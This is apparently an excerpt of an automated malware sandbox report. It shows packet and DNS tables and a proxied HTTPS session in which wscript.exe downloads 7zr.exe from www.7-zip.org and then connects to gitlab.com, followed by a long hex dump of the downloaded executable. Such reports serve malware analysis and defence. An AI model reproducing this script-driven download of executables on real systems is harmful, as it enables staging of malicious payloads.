                                                                                                                  Aug 3, 2023 17:59:56.665085077 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665122032 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.665131092 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665142059 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.665169001 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.665231943 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665254116 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665287018 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.665296078 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665324926 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.665343046 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.665452003 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665474892 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665510893 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.665519953 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665546894 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.665564060 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.665641069 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665664911 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665695906 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.665704012 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665740967 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.665800095 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665828943 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665838957 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.665847063 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665868044 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.665898085 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.665944099 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.665966034 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.666003942 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.666013002 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.666028976 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.666049004 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.666227102 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.666266918 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.666294098 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.666304111 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.666328907 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.666344881 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.666377068 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.666409016 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.666434050 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.666445017 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.666481018 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.666511059 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.666637897 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.666675091 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.666707993 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.666718960 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.666744947 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.666763067 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.666773081 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.666842937 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.666893959 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.667606115 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.677694082 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.687490940 CEST49700443192.168.2.7172.65.251.78
                                                                                                                  Aug 3, 2023 17:59:56.687521935 CEST44349700172.65.251.78192.168.2.7
                                                                                                                  Aug 3, 2023 18:00:23.131386042 CEST49701443192.168.2.7141.94.96.144
                                                                                                                  Aug 3, 2023 18:00:23.131432056 CEST44349701141.94.96.144192.168.2.7
                                                                                                                  Aug 3, 2023 18:00:23.131524086 CEST49701443192.168.2.7141.94.96.144
                                                                                                                  Aug 3, 2023 18:00:23.132507086 CEST49701443192.168.2.7141.94.96.144
                                                                                                                  Aug 3, 2023 18:00:23.132522106 CEST44349701141.94.96.144192.168.2.7
                                                                                                                  Aug 3, 2023 18:00:23.218895912 CEST44349701141.94.96.144192.168.2.7
                                                                                                                  Aug 3, 2023 18:00:23.221899986 CEST49701443192.168.2.7141.94.96.144
                                                                                                                  Aug 3, 2023 18:00:23.221924067 CEST44349701141.94.96.144192.168.2.7
                                                                                                                  Aug 3, 2023 18:00:23.224152088 CEST44349701141.94.96.144192.168.2.7
                                                                                                                  Aug 3, 2023 18:00:23.224308014 CEST49701443192.168.2.7141.94.96.144
                                                                                                                  Aug 3, 2023 18:00:23.227883101 CEST49701443192.168.2.7141.94.96.144
                                                                                                                  Aug 3, 2023 18:00:23.228128910 CEST44349701141.94.96.144192.168.2.7
                                                                                                                  Aug 3, 2023 18:00:23.277159929 CEST49701443192.168.2.7141.94.96.144
                                                                                                                  Aug 3, 2023 18:00:23.277184010 CEST44349701141.94.96.144192.168.2.7
                                                                                                                  Aug 3, 2023 18:00:23.324007034 CEST49701443192.168.2.7141.94.96.144
                                                                                                                  Aug 3, 2023 18:00:30.069935083 CEST44349701141.94.96.144192.168.2.7
                                                                                                                  Aug 3, 2023 18:00:30.277790070 CEST49701443192.168.2.7141.94.96.144
                                                                                                                  Aug 3, 2023 18:00:40.808442116 CEST44349701141.94.96.144192.168.2.7
                                                                                                                  Aug 3, 2023 18:00:40.860382080 CEST49701443192.168.2.7141.94.96.144
                                                                                                                  Aug 3, 2023 18:00:57.063710928 CEST44349701141.94.96.144192.168.2.7
                                                                                                                  Aug 3, 2023 18:00:57.123802900 CEST49701443192.168.2.7141.94.96.144
                                                                                                                  Aug 3, 2023 18:01:01.497669935 CEST44349701141.94.96.144192.168.2.7
                                                                                                                  Aug 3, 2023 18:01:01.546025991 CEST49701443192.168.2.7141.94.96.144
                                                                                                                  Aug 3, 2023 18:01:12.551242113 CEST44349701141.94.96.144192.168.2.7
                                                                                                                  Aug 3, 2023 18:01:12.597388983 CEST49701443192.168.2.7141.94.96.144
                                                                                                                  Aug 3, 2023 18:01:25.189613104 CEST44349701141.94.96.144192.168.2.7
                                                                                                                  Aug 3, 2023 18:01:25.235542059 CEST49701443192.168.2.7141.94.96.144
                                                                                                                  Aug 3, 2023 18:01:40.358042002 CEST44349701141.94.96.144192.168.2.7
                                                                                                                  Aug 3, 2023 18:01:40.408756018 CEST49701443192.168.2.7141.94.96.144

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Aug 3, 2023 17:59:55.448333979 CEST6032653192.168.2.78.8.8.8
                                                                                                                  Aug 3, 2023 17:59:55.477251053 CEST53603268.8.8.8192.168.2.7
                                                                                                                  Aug 3, 2023 17:59:56.142770052 CEST5083553192.168.2.78.8.8.8
                                                                                                                  Aug 3, 2023 17:59:56.169011116 CEST53508358.8.8.8192.168.2.7

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Aug 3, 2023 17:59:55.448333979 CEST192.168.2.78.8.8.80x4c44Standard query (0)www.7-zip.orgA (IP address)IN (0x0001)false
                                                                                                                  Aug 3, 2023 17:59:56.142770052 CEST192.168.2.78.8.8.80x485fStandard query (0)gitlab.comA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Aug 3, 2023 17:59:55.477251053 CEST8.8.8.8192.168.2.70x4c44No error (0)www.7-zip.org49.12.202.237A (IP address)IN (0x0001)false
                                                                                                                  Aug 3, 2023 17:59:56.169011116 CEST8.8.8.8192.168.2.70x485fNo error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • www.7-zip.org
                                                                                                                  • gitlab.com

                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  0192.168.2.74969949.12.202.237443C:\Windows\System32\wscript.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-08-03 15:59:55 UTC0OUTGET /a/7zr.exe HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Accept-Language: en-us
                                                                                                                  UA-CPU: AMD64
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                  Host: www.7-zip.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2023-08-03 15:59:55 UTC0INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Thu, 03 Aug 2023 15:59:55 GMT
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Length: 584704
                                                                                                                  Last-Modified: Tue, 20 Jun 2023 08:00:00 GMT
                                                                                                                  Connection: close
                                                                                                                  ETag: "64915c80-8ec00"
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2023-08-03 15:59:55 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 65 73 a4 05 04 1d f7 05 04 1d f7 05 04 1d f7 7e 18 11 f7 07 04 1d f7 6a 1b 16 f7 06 04 1d f7 86 18 13 f7 0d 04 1d f7 6a 1b 17 f7 0e 04 1d f7 6a 1b 19 f7 07 04 1d f7 8b 0c 42 f7 04 04 1d f7 05 04 1c f7 9d 04 1d f7 86 0c 40 f7 0c 04 1d f7 33 22 16 f7 82 04 1d f7 13 7b 19 f6 06 04 1d f7 33 22 17 f7 06 04 1d f7 1e 99 b7 f7 1c 04 1d f7 9d 76 1e f6 01 04 1d f7 c2 02 1b f7 04 04 1d
                                                                                                                  Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$Aes~jjjB@3"{3"v
                                                                                                                  2023-08-03 15:59:55 UTC16INData Raw: 8d 47 01 eb 02 33 c0 5f 5e c3 b8 50 2c 47 00 e8 32 a6 06 00 83 ec 4c 89 4d e0 53 8b 4d 10 33 db 39 59 04 75 15 8d 45 08 68 c0 02 48 00 50 c7 45 08 a0 93 47 00 e8 2c a6 06 00 56 57 89 5d d0 89 5d d4 89 5d d8 8d 55 d0 89 5d fc e8 3b f8 ff ff 8b 45 14 8b 4d d4 8b 55 d0 8b f0 8d 7d f0 c6 45 f3 01 8b 4c 8a fc c6 45 13 01 66 a5 39 59 04 a4 75 0e 80 65 f3 00 8d 4d d0 e8 50 05 00 00 eb 18 8a 40 02 3c 01 74 0d 3c 02 75 0d e8 0c fa ff ff 84 c0 74 04 80 65 13 00 8d 4d c4 e8 f6 e1 ff ff 83 4d e4 ff 83 7d d4 03 8b 1d c4 91 47 00 c6 45 fc 01 72 2e 8b 45 d0 8b 08 83 79 04 00 75 23 8b 48 04 83 79 04 00 75 1a 8b 40 08 68 8c 93 47 00 8b 00 50 ff d3 59 85 c0 59 75 07 c7 45 e4 02 00 00 00 83 7d 08 02 0f 84 be 00 00 00 83 4d e4 ff 8d 4d d0 e8 bc 01 00 00 83 7d 08 01 8b f8 8b
                                                                                                                  Data Ascii: G3_^P,G2LMSM39YuEhHPEG,VW]]]U];EMU}ELEf9YueMP@<t<uteMM}GEr.Eyu#Hyu@hGPYYuE}MM}
                                                                                                                  2023-08-03 15:59:55 UTC32INData Raw: 92 a2 ff ff 66 83 7d e8 5c c6 45 fc 07 74 24 66 83 7d e8 2f 74 1d 8b 4d d0 8d 04 1f 8d 04 41 8d 4d c4 50 e8 03 a6 ff ff 8d 4d c4 56 e8 fa a5 ff ff eb 0c 83 c6 02 8d 4d c4 56 e8 db a3 ff ff 8d 4d c4 e8 35 01 00 00 84 c0 75 04 32 db eb 47 83 7d f0 00 74 0b ff 75 f0 8b 4d ec e8 53 a6 ff ff 57 8d 45 ac 53 50 8d 4d d0 e8 eb 00 00 00 8b 4d ec 50 c6 45 fc 08 e8 fc a5 ff ff c6 45 fc 07 ff 75 ac e8 08 93 ff ff 59 8d 45 c4 8b 4d ec 50 e8 e3 a5 ff ff b3 01 ff 75 c4 e8 f1 92 ff ff 59 ff 75 d0 e8 e8 92 ff ff 59 8a c3 e9 9b 00 00 00 83 c6 04 8d 4d dc 56 e8 1e a2 ff ff 8b 4d dc c7 45 fc 02 00 00 00 e8 0e fb ff ff 8b f0 8b 45 dc 8d 4d b8 8d 3c 36 03 c7 50 e8 fc a1 ff ff 8d 4d b8 c6 45 fc 03 e8 93 00 00 00 84 c0 75 16 ff 75 b8 e8 9a 92 ff ff ff 75 dc e8 92 92 ff ff 59 32
                                                                                                                  Data Ascii: f}\Et$f}/tMAMPMVMVM5u2G}tuMSWESPMMPEEuYEMPuYuYMVMEEM<6PMEuuuY2
                                                                                                                  2023-08-03 15:59:55 UTC48INData Raw: 00 74 21 49 74 12 49 74 07 b8 01 00 03 80 eb 42 8b 48 20 8b 50 24 eb 06 8b 48 10 8b 50 14 01 4d 0c 11 55 10 8b 55 10 85 d2 7f 10 7c 07 8b 4d 0c 85 c9 73 0a b8 83 00 07 80 eb 17 8b 4d 0c 89 48 10 89 50 14 8b 45 18 85 c0 74 05 89 08 89 50 04 33 c0 5d c2 14 00 b8 fc 32 47 00 e8 e6 25 06 00 51 51 53 56 57 8b da 33 ff 89 4d f0 6a 30 89 3b e8 e6 52 ff ff 3b c7 59 74 10 89 78 04 89 78 08 c7 00 dc 99 47 00 8b f0 eb 02 33 f6 3b f7 89 75 ec 74 06 8b 06 56 ff 50 04 ff 75 f0 8d 4e 08 89 7d fc e8 ea dd ff ff 8b 45 08 8b 4d 0c 89 46 28 89 46 18 8b 45 10 89 4e 2c 89 46 20 8b 45 14 89 4e 1c 89 7e 10 8b ce 89 7e 14 89 46 24 e8 0b ff ff ff 3b c7 89 45 0c 74 13 83 4d fc ff 3b f7 74 06 8b 06 56 ff 50 08 8b 45 0c eb 0e 8b 06 57 57 57 57 56 ff 50 10 89 33 33 c0 8b 4d f4 5f 5e
                                                                                                                  Data Ascii: t!ItItBH P$HPMUU|MsMHPEtP3]2G%QQSVW3Mj0;R;YtxxG3;utVPuN}EMF(FEN,F EN~~F$;EtM;tVPEWWWWVP33M_^
                                                                                                                  2023-08-03 15:59:55 UTC64INData Raw: 47 00 e8 3b 00 01 00 8d 45 d4 68 28 14 48 00 50 e8 51 e6 05 00 83 fa 01 72 23 77 04 85 ff 72 1d ff 36 8d 4d d4 68 fc 9e 47 00 e8 13 00 01 00 8d 45 d4 68 28 14 48 00 50 e8 29 e6 05 00 52 57 8b cb e8 db 00 00 00 57 ff 15 c8 90 47 00 50 ff 15 9c 90 47 00 85 c0 75 37 ff 15 d8 90 47 00 68 f0 9e 47 00 8b cb 8b f0 e8 47 26 ff ff 8b d6 8d 4d c8 e8 58 4a ff ff 50 8b cb c6 45 fc 02 e8 f5 25 ff ff ff 75 c8 c6 45 fc 01 e8 01 13 ff ff 59 8b cb e8 6e 25 ff ff ff 75 e0 e8 f1 12 ff ff 59 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c2 08 00 51 83 64 24 00 00 56 8b f1 6a 00 e8 80 2e ff ff 8b c6 5e 59 c3 b2 01 b9 00 a0 47 00 e8 67 84 ff ff b2 01 b9 c4 9f 47 00 e9 5b 84 ff ff 55 8b ec 51 66 83 39 00 56 8b f2 75 04 32 c0 eb 15 8d 55 fc e8 eb 2e ff ff 8b 4d fc 89 06 33 c0 66 39
                                                                                                                  Data Ascii: G;Eh(HPQr#wr6MhGEh(HP)RWWGPGu7GhGG&MXJPE%uEYn%uYM_^[dQd$Vj.^YGgG[UQf9Vu2U.M3f9
                                                                                                                  2023-08-03 15:59:55 UTC80INData Raw: 8b d8 85 db 74 19 ff 75 d8 e8 81 d3 fe ff ff 75 cc e8 79 d3 fe ff 59 8b c3 59 e9 e6 03 00 00 80 7d 0b 00 74 10 80 3f 00 8b ce 0f 94 c0 88 46 39 e8 0a 13 00 00 8b 45 0c 80 20 00 e9 af 03 00 00 39 9e c0 01 00 00 74 67 80 be b0 00 00 00 00 75 5e 80 be b2 00 00 00 00 75 55 8b 55 e8 8b 4d ec 8d 45 f2 50 8d 45 bc 50 e8 a7 e2 ff ff 3b c3 0f 85 34 ff ff ff 80 7d f2 00 74 34 ff b6 c0 01 00 00 8d 8e bc 01 00 00 8d 45 bc 53 50 e8 fb 1c 00 00 83 f8 ff 74 19 8b 8e c8 01 00 00 8b 3c 81 39 5f 04 75 29 8d 45 d8 8b cf 50 e8 cf e3 fe ff 6a 20 e8 a5 d2 fe ff 59 89 45 ec 3b c3 c6 45 fc 05 74 64 8b c8 e8 24 9c ff ff 8b f8 eb 5b 8b 17 8b 4d d8 e8 cc 0d ff ff 84 c0 75 25 e8 c2 26 ff ff 8d 4d d8 57 51 8b ce ff 35 a0 a3 47 00 50 e8 a1 ef ff ff 3b c3 0f 84 f4 02 00 00 e9 a9 fe ff
                                                                                                                  Data Ascii: tuuyYY}t?F9E 9tgu^uUUMEPEP;4}t4ESPt<9_u)EPj YE;Etd$[Mu%&MWQ5GP;
                                                                                                                  2023-08-03 15:59:55 UTC96INData Raw: 08 8b 45 e4 88 5d fc 3b c3 74 06 8b 08 50 ff 51 08 8b 45 e0 83 4d fc ff 3b c3 74 06 8b 08 50 ff 51 08 33 c0 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c3 8b 45 e8 c6 45 fc 01 3b c3 74 06 8b 08 50 ff 51 08 8b 45 e4 88 5d fc 3b c3 74 06 8b 08 50 ff 51 08 8b 45 e0 83 4d fc ff 3b c3 74 06 8b 08 50 ff 51 08 8b 45 dc eb ba 8b 45 e8 c6 45 fc 01 3b c3 74 06 8b 08 50 ff 51 08 8b 45 e4 88 5d fc 3b c3 74 06 8b 08 50 ff 51 08 8b 45 e0 83 4d fc ff 3b c3 74 06 8b 08 50 ff 51 08 8b 45 dc eb 83 3b d3 c6 45 fc 01 74 09 8b 45 e8 50 8b 08 ff 51 08 8b 45 e4 88 5d fc 3b c3 74 06 8b 08 50 ff 51 08 8b 45 e0 83 4d fc ff 3b c3 74 06 8b 08 50 ff 51 08 b8 05 40 00 80 e9 47 ff ff ff 56 8b f1 57 8b 7c 24 0c ff 76 68 8d 4e 6c 8b 07 51 57 ff 50 0c 85 c0 75 0f 8b 07 81 c6 8c 00 00 00 6a
                                                                                                                  Data Ascii: E];tPQEM;tPQ3M_^[dEE;tPQE];tPQEM;tPQEEE;tPQE];tPQEM;tPQE;EtEPQE];tPQEM;tPQ@GVW|$vhNlQWPuj
                                                                                                                  2023-08-03 15:59:55 UTC112INData Raw: aa cd ff ff 8b b5 f0 fe ff ff ff 45 08 83 45 bc 10 8b 45 08 83 c6 08 3b 45 c4 89 b5 f0 fe ff ff 0f 82 e2 fc ff ff 8b 03 8b cb ff 50 04 83 85 74 ff ff ff 01 83 95 78 ff ff ff 00 ff 85 7c ff ff ff 8b 85 7c ff ff ff 3b 45 0c 0f 82 8b fc ff ff 33 c0 3b 85 0c ff ff ff 0f 87 9a 00 00 00 72 0f 8b 45 94 3b 85 08 ff ff ff 0f 83 89 00 00 00 ff 45 e8 33 ff e9 2b fc ff ff 8b f0 e9 25 01 00 00 ff 75 10 e8 07 53 fe ff ff 75 cc e8 ff 52 fe ff ff 75 c0 e8 f7 52 fe ff ff b5 e4 fe ff ff e8 ec 52 fe ff 8b 4d d0 83 c4 10 e8 58 e7 03 00 e9 35 f7 ff ff 8d 8d d4 fe ff ff e8 5a c7 fe ff 8d 8d 94 fe ff ff c6 45 fc 18 e8 e1 cc ff ff ff 75 10 e8 ba 52 fe ff ff 75 cc e8 b2 52 fe ff ff 75 c0 e8 aa 52 fe ff ff b5 e4 fe ff ff e8 9f 52 fe ff 83 c4 10 e9 db 00 00 00 8b 85 74 ff ff ff 0b
                                                                                                                  Data Ascii: EEE;EPtx||;E3;rE;E3+%uSuRuRRMX5ZEuRuRuRRt
                                                                                                                  2023-08-03 15:59:55 UTC128INData Raw: 33 ed 8b d9 39 6f 04 76 35 56 8b 07 8b 34 a8 80 7e 0c 00 75 22 83 7e 04 01 75 1c 83 7b 04 00 75 0b 8b ce e8 73 f1 ff ff 84 c0 75 0b 8b 06 8b cb 8b 10 e8 07 ff ff ff 45 3b 6f 04 72 cd 5e 5f 5d 5b c3 b8 0c 48 47 00 e8 fa e5 04 00 51 56 8b f1 89 75 f0 e8 3e 22 fe ff ff 75 08 83 65 fc 00 8b ce e8 4d 26 fe ff 83 7d 0c 00 74 11 8b ce e8 91 25 fe ff ff 75 0c 8b ce e8 ae 25 fe ff 8b 4d f4 8b c6 5e 64 89 0d 00 00 00 00 c9 c2 08 00 b8 20 48 47 00 e8 ae e5 04 00 51 56 8b f1 89 75 f0 e8 f2 21 fe ff ff 75 08 83 65 fc 00 8b ce e8 79 25 fe ff 83 7d 0c 00 74 11 8b ce e8 45 25 fe ff ff 75 0c 8b ce e8 62 25 fe ff 8b 4d f4 8b c6 5e 64 89 0d 00 00 00 00 c9 c2 08 00 53 8b 5c 24 08 56 57 8b f9 8b 07 8b 34 98 85 f6 74 0e 8b ce e8 0e 01 00 00 56 e8 96 12 fe ff 59 53 8b cf e8 71
                                                                                                                  Data Ascii: 39ov5V4~u"~u{usuE;or^_][HGQVu>"ueM&}t%u%M^d HGQVu!uey%}tE%ub%M^dS\$VW4tVYSq
                                                                                                                  2023-08-03 15:59:55 UTC144INData Raw: 5f f8 ff ff e8 ee ac fe ff 8d 4d d4 8b f0 c6 45 fc 08 e8 7e a7 01 00 8b 4d ec e8 e7 67 03 00 8d 4d e8 c6 45 fc 02 e8 6a a7 01 00 8d 4d b8 c6 45 fc 01 e8 53 d0 00 00 80 65 fc 00 8d 8d 20 ff ff ff e8 8a e6 ff ff 8b c6 e9 b6 f7 ff ff b8 f8 42 42 00 c3 8b 44 24 04 53 56 57 83 f8 08 8b f9 77 1f 33 f6 85 c0 76 11 8d 54 02 ff 8a 0c 3e 3a 0a 75 27 46 4a 3b f0 72 f3 b0 01 5f 5e 5b c2 04 00 33 db 85 c0 76 f2 8b f7 2b f2 8a 0c 16 3a 0a 75 08 43 42 3b d8 72 f3 eb df 32 c0 eb dd b8 c0 4c 47 00 e8 9f a5 04 00 83 ec 20 56 57 83 fa 20 8b f9 75 07 be 68 af 47 00 eb 2e 83 fa 14 75 07 be 48 af 47 00 eb 22 83 fa 10 75 07 be 44 af 47 00 eb 16 83 fa 08 75 07 be 34 af 47 00 eb 0a 83 fa 04 75 5b be 08 ad 47 00 53 56 8d 4d e0 e8 0f db fd ff 83 65 fc 00 8d 55 ec 8b c8 e8 44 5a fe
                                                                                                                  Data Ascii: _ME~MgMEjMESe BBD$SVWw3vT>:u'FJ;r_^[3v+:uCB;r2LG VW uhG.uHG"uDGu4Gu[GSVMeUDZ
                                                                                                                  2023-08-03 15:59:55 UTC160INData Raw: 75 33 80 7d f3 00 74 11 8b 4b 10 ba c0 b1 47 00 e8 41 99 fd ff 84 c0 75 1c 8d 8d 7c ff ff ff e8 15 e0 01 00 8b 45 80 8b 8d 7c ff ff ff ff 45 80 89 34 81 eb 1a 8b 45 e4 ff 45 e4 56 50 8d 8d 7c ff ff ff e8 82 74 fe ff 8b 45 d0 c6 04 06 01 8b 07 46 3b 70 0c 0f 82 2f ff ff ff 33 db 39 5f 30 75 15 6a 01 58 39 45 e4 74 0a be 01 40 00 80 e9 8b 03 00 00 89 45 80 8b 4f 30 3b cb 0f 84 b3 02 00 00 83 7d 80 02 0f 82 1d 03 00 00 e8 da 71 fe ff 8b f0 3b f3 0f 85 64 03 00 00 89 5d bc 89 5d c0 89 5d c4 89 5d c8 89 5d cc 39 5d e4 c6 45 fc 05 0f 84 28 02 00 00 8d 8d 34 ff ff ff e8 c4 29 00 00 84 c0 0f 85 15 02 00 00 8b 8d 34 ff ff ff ba 40 b3 47 00 e8 21 98 fd ff 84 c0 0f 85 cf 00 00 00 8b 8d 34 ff ff ff ba 3c b3 47 00 e8 09 98 fd ff 84 c0 0f 85 b7 00 00 00 be 00 04 00 00
                                                                                                                  Data Ascii: u3}tKGAu|E|E4EEVP|tEF;p/39_0ujX9Et@EO0;}q;d]]]]]9]E(4)4@G!4<G
                                                                                                                  2023-08-03 15:59:55 UTC176INData Raw: 04 00 8d 55 fc e8 9f 70 fd ff 89 45 f4 8b 45 fc 3b c7 89 55 f8 74 63 66 8b 08 66 85 c9 74 6e 66 83 78 02 00 75 54 66 83 f9 41 72 09 66 83 f9 5a 77 03 83 c1 20 0f b7 c1 83 e8 62 74 50 83 e8 05 74 1a 83 e8 04 74 11 48 48 74 09 83 e8 07 75 2a 6a 28 eb 0a 6a 14 eb 06 6a 0a eb 02 6a 1e 5f 33 d2 6a 40 59 6a 01 2b cf 58 e8 18 29 04 00 39 55 f8 72 0b 77 05 39 45 f4 72 04 32 c0 eb 19 8b 45 f4 8b 55 f8 8b cf e8 fb 28 04 00 eb 03 8b 45 f4 89 06 89 56 04 b0 01 5f 5e c9 c3 b8 cc 55 47 00 e8 a1 25 04 00 83 ec 34 53 56 89 4d ec 57 8b 4d 08 8b fa e8 ef 03 00 00 8b 47 04 80 65 f3 00 33 f6 85 c0 0f 86 8f 00 00 00 8b 07 66 ba 2e 00 8d 0c 70 e8 c5 56 fd ff 85 c0 7c 07 8d 1c 30 85 db 7d 03 8b 5f 04 8b c3 8b cf 2b c6 50 8d 45 e0 56 50 e8 63 c0 fd ff 83 65 fc 00 83 7d e4 00 74
                                                                                                                  Data Ascii: UpEE;UtcfftnfxuTfArfZw btPttHHtu*j(jjj_3j@Yj+X)9Urw9Er2EU(EV_^UG%4SVMWMGe3f.pV|0}_+PEVPce}t
                                                                                                                  2023-08-03 15:59:55 UTC192INData Raw: 8c e8 89 13 fd ff 8b 45 2c 59 8b 4d dc 53 51 89 58 18 8d 48 08 89 58 1c e8 2c 6e fd ff 84 c0 75 44 ff 15 d8 90 47 00 83 f8 50 75 18 8b 45 14 38 58 3c 74 10 ff 45 08 81 7d 08 00 00 01 00 0f 82 5a ff ff ff 8b 4d 30 8d 45 dc 50 68 14 bf 47 00 e8 56 d5 ff ff 8b f0 ff 75 dc e8 30 13 fd ff 59 e9 8d 02 00 00 8b 4d 28 e8 cc 5f 01 00 8b 4d 28 8d 45 dc 50 e8 b1 09 fd ff c6 45 fc 0c ff 75 dc e8 0a 13 fd ff 59 e9 29 01 00 00 38 5e 06 0f 85 24 08 00 00 8b 45 10 3b c3 74 7d 8b 88 d8 00 00 00 8b 90 dc 00 00 00 03 48 50 13 50 54 89 55 e4 78 66 7f 04 3b cb 76 60 8b 45 ec c6 45 fc 0b 3b c3 74 06 8b 08 50 ff 51 08 8b 45 e8 c6 45 fc 08 3b c3 74 06 8b 08 50 ff 51 08 3b fb c6 45 fc 03 74 06 8b 07 57 ff 50 08 8d 4d a4 c6 45 fc 02 e8 96 0f 00 00 ff 75 d0 e8 93 12 fd ff 59 8b 45
